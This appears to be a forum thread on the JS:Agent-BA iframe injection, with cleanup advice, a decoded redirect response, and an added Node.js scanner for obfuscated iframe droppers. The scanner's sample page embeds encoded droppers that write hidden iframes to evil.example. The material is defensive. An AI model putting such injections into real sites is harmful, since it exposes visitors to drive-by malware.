Hello,
Has someone found information about the script worm JS:Agent-Ba Trj?
I can't get detailed information about this script worm…
Does it attack a webserver via SQL injection?
Is this part of a real worm?
TIA
thE_iNviNciblE
Hi the_invincible,
It is what a particular dropper drops (e.g. a Schädling, German for "pest", i.e. a piece of malware).
There is info about this here: http://vil.nai.com/vil/content/v_142067.htm
You could try to do a full scan with MBAM; download from here: http://www.majorgeeks.com/downloadget.php?id=5756&file=15&evp=693ee0b20204960edfd909666f809b26
For cleaning, it could be that you have to temporarily disable System Restore; read:
http://www.pchell.com/virus/systemrestore.shtml
polonus
JS:Agent-BA is an encrypted iframe that is injected into a legitimate HTML page. This detection covers many target malware servers, so "what it does" depends highly on the targeted URL.
The hack could be done by SQL injection, a weak/stolen password, or through some old, unpatched and vulnerable piece of software installed on your server.
Hi the_invincible,
As jsejtko stated, to be protected against future (re-)infection it is of the utmost importance that you have your Windows version updated with the latest Service Pack(s), have all issued patches installed, are not going around the Internet with an outdated or not fully patched vulnerable browser, and make sure that all the third-party software (Sun Java, Adobe Reader and what have you) on it is of the latest version and fully patched. A really good tool to check that, and to keep checking it, is Secunia PSI, to be downloaded from here: http://secunia.com/PSISetup.exe
First you could do an online scan at their site: http://secunia.com/vulnerability_scanning/online/?task=start
polonus
Hello, thanks a lot for the information about this bad JavaScript stuff.
I've decrypted the iframe stuff… it loads something like this here:
*http://pipet.t35.com
*---------------------------------------
HTTP/1.1 302 Found
Date: Mon, 16 Feb 2009 14:35:52 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.6 with Suhosin-Patch
X-Powered-By: ModLayout/5.1
Referer:
*Location: http://pipet.t35.com?743053fb11c708a4=*
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
110
<!-- T35 Hosting Ad Code Style Begin -->
<style type="text/css">
#t35ad a{
font: 14px arial,helvetica;
text-decoration: none; }
#t35ad a:hover{
background-color: black;
color: white;
font-size:medium;
font-weight: bold; }
</style>
<!-- T35 Hosting Ad Code Style End -->
4ad
</noscript></noframes>
<!-- T35 Hosting Ad Code Begin -->
<table border="0" width="100%" cellspacing="0" cellpadding="0">
  <tr>
    <td width="20">
<!-- Start of Stat Code -->
<img src="http://c11.statcounter.com/1120767/0/78e6f3a5/1/" width="1" height="1" alt=" " border="0" />
<!-- End of Stat Code -->
</td>
    <td><div id="t35ad" align="center" style="display:block;">
<a target=_blank href=http://www.casinolistings.com>Casino Online</a> | <a target="_blank" href="http://my-weight-loss.org/free-trial-green-tea-diet/">Fast Weight Loss</a> | <a target="_blank" href="http://www.lifeinitaly.com ">Italy</a> | <a target=_blank href=http://www.hypercasinos.com>Online Casinos</a> | <a target="_blank" href="http://www.drugrehabcenter.com/">Drug Rehab</a> |
<a target=_blank href=http://www.latestcasinobonuses.com>Online Casino</a>
    </div></td>
    <td width="20"><a target="_blank" href="http://www.t35.com">
    <img border="0" src="http://freehostcp.t35.com/t35.gif" width="20" height="20" alt="Free Web Hosting" align="right" /></a></td>
  </tr>
</table>
<!-- T35 Hosting Ad Code End -->
Please have a look at this topic.
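To make jsejtko's description of an "encrypted iframe injected into a legitimate HTML page" concrete, and to show the kind of decoding thE_iNviNciblE did by hand before fetching the target, here is an added example. It is not code from this thread, from avast or from any real dropper. It is a small static scanner in Node.js that pulls the script blocks out of a page, textually undoes the two encodings such droppers typically used (unescape("%3C...") and String.fromCharCode(60,105,...)) without ever calling eval(), and lists every iframe target together with whether it is concealed (1x1 pixel, display:none, visibility:hidden). The sample page, the helper encodeFromCharCode() that builds one of the encoded scripts, and the hosts evil.example and partner.example are all constructed for the example and are not indicators from the thread.

```javascript
// Added example, not from the thread, avast or any real dropper: a static
// scanner for obfuscated iframe injections. Nothing here is executed with eval().

// Legacy JavaScript unescape(): %XX bytes and %uXXXX UTF-16 code units.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, b) =>
    String.fromCharCode(parseInt(u !== undefined ? u : b, 16)));
}

// Textually replace unescape('...') and String.fromCharCode(n, n, ...) with
// the string they evaluate to; loop because droppers nest one in the other.
function deobfuscate(js) {
  let prev;
  let cur = js;
  do {
    prev = cur;
    cur = cur.replace(/unescape\(\s*(['"])((?:(?!\1).)*)\1\s*\)/g,
      (m, q, body) => jsUnescape(body));
    cur = cur.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g,
      (m, list) => list.split(',')
        .filter((n) => n.trim() !== '')
        .map((n) => String.fromCharCode(parseInt(n.trim(), 10)))
        .join(''));
  } while (cur !== prev);
  return cur;
}

const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const IFRAME_RE = /<iframe\b([^>]*)>/gi;

// Pull one attribute value (double-quoted, single-quoted or bare) out of an
// iframe's attribute list.
function attr(attrs, name) {
  const re = new RegExp('(?:^|\\s)' + name +
    '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(attrs);
  if (!m) return undefined;
  return m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]);
}

// Injected iframes are hidden: tiny dimensions or CSS that removes them from view.
function isConcealed(attrs) {
  const w = parseInt(attr(attrs, 'width'), 10);
  const h = parseInt(attr(attrs, 'height'), 10);
  const style = (attr(attrs, 'style') || '').replace(/\s+/g, '').toLowerCase();
  return (!Number.isNaN(w) && w <= 1) || (!Number.isNaN(h) && h <= 1) ||
    style.includes('display:none') || style.includes('visibility:hidden');
}

// Returns [{src, concealed, via}]: iframes present in the clear ('static') and
// iframes that scripts write out, tagged 'obfuscated-script' when decoding
// changed the script text and 'script' when it was already plain.
function scanPage(html) {
  const findings = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    findings.push({ src: attr(m[1], 'src'), concealed: isConcealed(m[1]), via: 'static' });
  }
  for (const s of html.matchAll(SCRIPT_RE)) {
    const decoded = deobfuscate(s[1]);
    for (const m of decoded.matchAll(IFRAME_RE)) {
      findings.push({
        src: attr(m[1], 'src'),
        concealed: isConcealed(m[1]),
        via: decoded === s[1] ? 'script' : 'obfuscated-script',
      });
    }
  }
  return findings;
}

// Helper (constructed for this example) that produces a String.fromCharCode
// dropper of the kind seen in the wild, so the sample page carries one.
function encodeFromCharCode(text) {
  const codes = Array.from(text, (c) => c.charCodeAt(0)).join(',');
  return 'eval(String.fromCharCode(' + codes + '))';
}

// Constructed sample page: two injected droppers plus one legitimate iframe.
// evil.example and partner.example are placeholders, not real indicators.
const SAMPLE_HTML = [
  '<html><head><title>Legit shop</title></head><body>',
  '<h1>Welcome</h1>',
  "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//evil.example/in.php%22%20width%3D1%20height%3D1%20style%3D%22visibility%3Ahidden%22%3E%3C/iframe%3E'));</script>",
  '<script>' + encodeFromCharCode(
    'document.write(\'<iframe src="http://evil.example/b.html" style="display:none"></iframe>\')') + '</script>',
  '<iframe src="http://partner.example/widget" width="300" height="200"></iframe>',
  '</body></html>',
].join('\n');

console.log(scanPage(SAMPLE_HTML));
```

Run it with `node scan.js` against a saved copy of a suspect page (replace SAMPLE_HTML with the file contents). The decoding is deliberately textual: real droppers of this family also use eval() over string concatenation, XOR loops and other tricks, and those need a sandboxed interpreter rather than pattern replacement, but the two encodings handled here are enough to surface the redirect URL in a case like the one posted above without ever letting the payload run.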